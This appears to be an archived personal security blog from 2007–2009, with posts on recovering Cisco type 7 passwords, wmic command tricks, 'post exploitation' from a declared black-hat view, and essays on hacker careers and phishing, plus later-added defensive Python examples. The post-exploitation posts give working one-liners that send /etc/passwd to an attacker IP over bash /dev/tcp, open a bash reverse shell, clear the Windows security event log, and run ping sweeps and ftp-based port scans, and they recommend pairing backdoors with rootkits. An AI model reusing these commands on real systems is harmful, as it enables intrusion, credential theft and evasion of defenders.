
Friday, May 22, 2009

Decrypting...No..Deobfuscating Cisco IOS Passwords

Why do I say deobfuscating rather than decrypting?

The level 7 password is not actually encrypted. A Vigenere-style algorithm is used to obfuscate the password (there is no key used in this algorithm).

Cisco IOS uses this level-7 encryption when the "service password-encryption" command is used. 

I found some interesting info while I was looking for tools to decrypt Cisco level 7 passwords. Yes, you may know that there are lots of tools available on the net which decrypt Cisco type 7 secrets, but this method got my attention since it uses Cisco commands themselves to obtain the cleartext password from the secret.

Here it goes...
The show key chain command executed on Cisco IOS displays the password configured in a key chain in cleartext, even when the same password is stored as a type-7 obfuscated password in the router configuration.

For example, if you want to get the cleartext password corresponding to the string 04480E051A33490E, enter the following lines into the router configuration (any router's configuration; it can be your own router, it does not need to be the victim's router :D):

R1(config)#key chain test
R1(config-keychain)#key 1
R1(config-keychain-key)#key-string 7 04480E051A33490E

When you execute the show key chain test command, the cleartext value of the password is displayed:

R1#show key chain test
Key-chain decrypt:
key 1 -- text "secure"
accept lifetime (always valid) - (always valid) [valid now]
send lifetime (always valid) - (always valid) [valid now]


Voila, cleartext without using any tools.

I also found Perl code by Bostjan Sustar that does the same task.
The perl code is uploaded at http://neo1981.googlepages.com/decrypt_cisco.pl
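As an added example (not code from the post, nor Bostjan Sustar's script), here is the type 7 deobfuscation in Python: IOS XORs the password bytes against a constant, publicly known translation string, and the first two digits of the stored value select the start offset into it. The block decodes the post's sample string, round-trips it, and includes an audit helper that lists every type 7 secret in a constructed config fragment so they can be replaced with hashed secrets.

```python
"""Cisco IOS type 7 deobfuscation plus an audit for type 7 secrets left in a config.

Added example; not code from the post or from Bostjan Sustar's decrypt_cisco.pl.
"""
import re
from typing import List, Tuple

# The constant translation string every IOS image XORs password bytes against.
# It is public and identical on all devices, so type 7 is hiding, not encryption.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
TYPE7 = re.compile(r"^(\d{2})((?:[0-9A-Fa-f]{2})+)$")
TYPE7_LINE = re.compile(r"\b(password|key-string)\s+7\s+([0-9A-Fa-f]+)")


def decode_type7(secret: str) -> str:
    """First two decimal digits select the start offset into XLAT; the rest is hex."""
    m = TYPE7.match(secret.strip())
    if not m:
        raise ValueError(f"not a well-formed type 7 string: {secret!r}")
    offset, data = int(m.group(1)), bytes.fromhex(m.group(2))
    if offset >= len(XLAT):
        raise ValueError(f"offset {offset} exceeds key length")
    plain = bytes(b ^ XLAT[(offset + i) % len(XLAT)] for i, b in enumerate(data))
    return plain.decode("latin-1")


def encode_type7(plain: str, offset: int = 0) -> str:
    """Inverse of decode_type7, handy to confirm a recovered value round-trips."""
    body = bytes(b ^ XLAT[(offset + i) % len(XLAT)]
                 for i, b in enumerate(plain.encode("latin-1")))
    return f"{offset:02d}{body.hex().upper()}"


def audit_config(config: str) -> List[Tuple[str, str]]:
    """(config line, recovered cleartext) per type 7 secret; hashed 'secret 5/8/9' lines are ignored."""
    hits = []
    for line in config.splitlines():
        m = TYPE7_LINE.search(line)
        if m:
            hits.append((line.strip(), decode_type7(m.group(2))))
    return hits


# Constructed config fragment (not from a real device) reusing the post's sample string.
SAMPLE_CONFIG = """\
service password-encryption
username admin password 7 04480E051A33490E
enable secret 5 $1$PLACEHOLDER$notarealhash
key chain test
 key 1
  key-string 7 04480E051A33490E
"""
```

Note that the sample decodes with a trailing space byte, which the show key chain output above does not make visible.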

Tuesday, March 17, 2009

Windows Commandline KungFu Part 2

If you check out wmic, it has many good features that we never use. Since I like the command line very much, I am always into commands and keyboard shortcuts. :D

Now some more info about wmic...
If you use the command

C:\> wmic /?

then you get a list of the attributes and all the settings for the given alias.

For example type

C:\>wmic share list full

AccessMask=
AllowMaximum=TRUE
Description=Remote IPC
InstallDate=
MaximumAllowed=
Name=IPC$
Path=
Status=OK
Type=-2147483645
...
...

Good? Not enough? There is more: wmic is object oriented, so you've got attributes and methods. Attributes are cool, letting you get info about your box and tweak it a bit, but methods let you take action on a box, giving you real power.

For example

C:\> wmic process where name="cmd.exe" call getowner

Or, even:

C:\> wmic process where name="cmd.exe" call getownersid

Nice! Isn't it?

Second example: we want a built-in command to reboot or shut down a Windows box across the network. Try this

C:\> wmic os where buildnumber="2600" call reboot


Third example: get a parameter (attribute of an object)

C:\>wmic nic get macaddress,name


You want interface-related methods? Check these out:

C:\> wmic nicconfig call setdefaultttl 200
C:\> wmic nicconfig call settcpwindowsize 3212

Those change the IP TTL and TCP Window size from default settings to something else, possibly fooling some forms of passive OS fingerprinting. Be careful with them, though... changing those settings could hose your network performance, make your system ugly, and make your hair fall out. You have been warned!

Now how about some nasty examples :D
Like from post exploitation ;)

you could:

C:\> wmic nteventlog where (description like "%secevent%") call cleareventlog

Guess what that would do????


or events like those associated with logging onto the box:

C:\> wmic ntevent where (message like "%logon%") list brief

Fifth, here is one that could be useful for incident handlers:

C:\>wmic netlogin where (name like "%neo%") get numberoflogons
NumberOfLogons
1760

Where neo is the username, of course.

You can use methods associated with "wmic service" to change the service configuration, as in:

C:\> wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled


//Spot odd executables
C:\> wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath

//Look at services that are set to start automatically
C:\> wmic SERVICE WHERE StartMode="Auto" GET Name, State

//Find user-created shares (usually not hidden)
C:\> wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path

//Find stuff that starts on boot
C:\> wmic STARTUP GET Caption, Command, User

//Identify any local system accounts that are enabled (guest, etc.)
C:\> wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name

Enjoyyyyy....
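As an added example (not from the post), the spot-checks above can also be applied offline to saved wmic output; this Python script parses the Key=Value record layout that "wmic share list full" prints and mirrors the share and process filters, with the sample records constructed for the demonstration.

```python
"""Parse 'wmic <alias> list full' output and apply the post's spot-checks offline.
Added example, not from the original post; samples are constructed to match
the blank-line separated Key=Value layout wmic prints."""
from typing import Dict, List, Tuple

SAMPLE_SHARES = """\
Description=Remote IPC
Name=IPC$
Path=

Description=
Name=Tools
Path=C:\\Tools
"""

SAMPLE_PROCESSES = """\
ExecutablePath=C:\\Windows\\System32\\svchost.exe
Name=svchost.exe

ExecutablePath=C:\\Users\\Public\\updater.exe
Name=updater.exe
"""


def parse_wmic_full(text: str) -> List[Dict[str, str]]:
    """Split blank-line separated Key=Value records into dicts (empty values kept)."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key] = value
    if current:
        records.append(current)
    return records


def user_created_shares(records) -> List[Tuple[str, str]]:
    """Same filter as: wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path."""
    return [(r["Name"], r.get("Path", "")) for r in records if not r["Name"].endswith("$")]


def processes_outside_windows(records) -> List[str]:
    """Same filter as the 'spot odd executables' query; blank paths (System) are skipped."""
    return [r["ExecutablePath"] for r in records
            if r.get("ExecutablePath") and "windows" not in r["ExecutablePath"].lower()]
```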

Thursday, January 29, 2009

Post Exploitation 2

We had a discussion going on the topic of post exploitation when I realized that in my first post I didn't put anything specific to Windows. So I am adding that information in this second post on the topic.

Lots of people don't know that there is a FOR loop on the Windows command line, using which we can run a ping sweep or port scan from cmd without any third-party tools.

Ex.

Ping sweep: using the following command we can run a ping sweep
FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

This command will run a ping sweep over 10.10.10.0/24.

Command line port scanner using the ftp client:
The Windows ftp client can be used as a port scanner.
But
C:\> ftp [IP_address]
does not allow us to specify a port number and defaults to port 21 for the connection.
But... we can specify a destination port in an ftp command file:
- open [IP_addr] [port]

The ftp client can then read this command file and execute the commands in it.

C:\> ftp -s:[filename]

So using this and FOR loop together...

for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Now ports.txt will have the output of the port scanner.

One more option in the FOR command lets us use a file as input.

Ex. There is a file named PTips.txt containing one IP address per line,
so the following command will iterate through the file.

FOR /F "delims=^" %i in (PTips.txt) do ping %i

C:\>ping 222.222.222.222
Pinging 222.222.222.222 with 32 bytes of data:
Reply from 222.222.222.222: Destination net unreachable.
...
...

One more addition.
Having only cmd on Windows does put a lot of restrictions on you.
Lots of the time I miss the simple commands Linux has for fetching HTML pages.
Can we download HTML pages on Windows without a browser???
...
Yes we can.
The problem with telnet is that it doesn't allow us to redirect the output or screen to a file...
So... so we use -f to create a log of the telnet session.
Ex. Windows telnet as a simple HTTP GET tool
C:\> telnet -f log.txt
Welcome to Microsoft Telnet Client
Escape Character is 'CTRL+]'
Microsoft Telnet>o in.yahoo.com 80
...
Microsoft Telnet>sen GET / HTTP/1.0
...
The HTML contents will scroll by all of a sudden, but don't worry,
all that content will be saved to the log file: log.txt
There you go.

Tuesday, January 27, 2009

Post Exploitation...

One of my friends asked: "the scenario is that you have got an interactive shell on a remote machine (Linux/Windows) with admin privileges (not semi-interactive like c99, r57 etc., i.e. suppose you have got the command prompt / console)"

Now what do you think you would be doing as "POST EXPLOITATION" to have complete control over the server?

As per his request, my answer is from the black hat perspective...

After getting access to any victim machine, the most important thing is to maintain access, and a hacker should do all things necessary to maintain access.

I had heard a comment from someone that he would install some service like VNC. Of course this is a lame answer according to me, but it draws attention to a basic point: should we install some different backdoor? I would rather suggest using an existing service as the backdoor instead of creating a new one, because at this point we have to consider the fact that normally there would be some firewall in between the attacker and the victim. So creating a new backdoor might not be useful if the firewall is not allowing that service to accept connections. Anyway, installing a new backdoor means more files transferred to the victim, therefore more chances of getting detected.

If one wants to use a backdoor then it should be used together with a rootkit, of course.
E.g.
Windows rootkit, ex. AFX Windows Rootkit: this rootkit will hide processes, files, folders,
registry keys and netstat entries on Windows 95/98/ME/NT/2k/XP/2003.

Linux rootkits: I am not giving a particular example; there are lots of them which hide processes, files etc.

Using built-in Linux tools instead of external backdoors
For Linux I would rather use the built-in tools to do things for me.
The most important reason for this is "no external tool means nothing for antivirus to detect" B-)

On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
Ex.
Victim>echo "Hello WOrld" > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
Hello WOrld

Not impressed? Then look at this

Victim>cat /etc/passwd > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
root:x:0:0:root:/root:bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...
...

Transfer files without even using nc.

OK, file transfer can be done. What else do I want to do on my rooted box?
Have a backdoor shell, scan for other machines; can we do that without external tools???
...

Of course we can.
How??
Linux /dev/tcp .... is the key

Victim$>/bin/bash -i > /dev/tcp/10.10.10.66/2345 0<&1 2>&1

Attacker>nc -l -p 2345
victim@linux:~$whoami
user12

Now port scanning...
You guessed correctly, /dev/tcp :D

$ echo > /dev/tcp/10.10.10.66/25
bash: connect: Connection refused
bash: /dev/tcp/10.10.10.66/25: Connection refused

$ echo > /dev/tcp/10.10.10.66/80
$ #Command successful means port 80 is listening


These are just some examples; you can go ahead with your own tricks... So this concludes some of the things (only some of the things.. ;) ) I would do post exploitation.
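From the defender's side, the /dev/tcp idioms above leave distinctive traces in shell history and auditd command records; this added Python script (not part of the original post) classifies such command lines as exfiltration, reverse shell or port probe, using the post's own one-liners as constructed sample input.

```python
"""Flag command lines that use bash's /dev/tcp pseudo-device.

Added example, not from the original post. Input is a constructed list of
command lines of the kind pulled from auditd execve records or a captured
.bash_history; the post's own /dev/tcp one-liners are reused as samples.
"""
import re
from typing import List, Optional, Tuple

DEV_TCP = re.compile(r"/dev/tcp/(?P<host>[\w.\-]+)/(?P<port>\d+)")
Hit = Tuple[str, str, int]  # (category, host, port)


def classify_dev_tcp(cmd: str) -> Optional[Hit]:
    """Return (category, host, port) if cmd touches /dev/tcp, else None."""
    m = DEV_TCP.search(cmd)
    if not m:
        return None
    host, port = m.group("host"), int(m.group("port"))
    before, after = cmd[: m.start()], cmd[m.end():]
    # An interactive shell whose stdin is tied back to the socket is a reverse shell.
    if re.search(r"\b(ba)?sh\b.*\s-i\b", before) and re.search(r"0<&1|<&\d", after):
        return ("reverse-shell", host, port)
    # 'echo >' with nothing to write is the post's port-probe idiom.
    if re.match(r"\s*echo\s*>\s*$", before):
        return ("port-probe", host, port)
    # Any other redirect into the device is data leaving the host.
    if re.search(r">\s*$", before):
        return ("exfil", host, port)
    return ("other", host, port)


def scan_commands(lines: List[str]) -> List[Hit]:
    """Run the classifier over many command lines, keeping only the hits."""
    return [h for h in (classify_dev_tcp(line) for line in lines) if h]


# Constructed sample history: the post's idioms plus benign noise that must not match.
SAMPLE_HISTORY = [
    "ls -la /home",
    'echo "Hello WOrld" > /dev/tcp/10.10.10.66/2345',
    "cat /etc/passwd > /dev/tcp/10.10.10.66/2345",
    "/bin/bash -i > /dev/tcp/10.10.10.66/2345 0<&1 2>&1",
    "echo > /dev/tcp/10.10.10.66/80",
    "grep -r dev/tcp /usr/share/doc/bash",
]
```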

Monday, July 28, 2008

Hacker and Security Consultant

Some days ago, when I was viewing a video from ShmooCon 2008, Hackajar mentioned a very interesting difference between a hacker and a security professional. He said
"Under the age of 25 you are a hacker; over the age of 25 you are a security professional"
So I was thinking about this statement and I was like "Wow", how true!! When we are young we don't have responsibilities on us. Most probably our parents are paying for our education and our living. At that time we can go on and on doing hacking stuff, but we don't get any pay for it. They say there are white hats and black hats, and black hats don't like white hats, but there is one important statement made by Simple Nomad in this talk:

"The basic difference between a black hat and a white hat hacker is that the white hat has a mortgage."
So when you get a little older, responsibilities come; you need to earn a living. At that time one will think: I like to hack things, and if I get money to hack things then why shouldn't I take this opportunity? Yes, there are some restrictions on you when you become a white hat, but everything has its plus and minus. So it is so true that as hackers get older they might move to the security scene. So what's bad in that?

Wednesday, July 18, 2007

Lack of Information Security Concern in India - Part 2

Continuing from where I left off...
The only sector which has a little bit of a sense of security is the financial sector. That too they have learned from the foreign financial institutes. There have been lots of wire frauds and cracking in the financial sector. Lots of the time this kind of cracking is done by a script kiddie.
(For the dummies: a script kiddie is a person who just downloads some programs and tries to attack a computer system without understanding what the program does. I have also seen cases where script kiddies were using some Windows cracking program against Linux systems.)
The most famous crack in the financial sector is phishing (pronounced "fishing"). Phishing is done using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by sending a mail that appears to come from the financial institute. eBay and PayPal are two of the most targeted companies, and online banks are also common targets.
Phishing also works most of the time when there is no concern about security in the user's mind. Now, I have a concern for security; I know that no bank in the world will ask me to send my password by mail. But lots of normal users don't understand this. Phishing also uses fake websites a lot of the time. But if the user is careful to look at the URL bar and see that the URL of the site is different from the URL the user intended to visit, then harm can be avoided. I know some of you will say that there are some JavaScripts that try to cover the address bar with an image of the legitimate URL. But this type of phishing is more sophisticated and not that common in number. (If we disable JavaScript for unknown sites we can stop this kind of attack.) A lot more phishing is done by script kiddies than by pros. I won't say we will be 100% secure, but with a little bit of awareness we can avoid these script kiddies. So I say again that awareness in people is a must.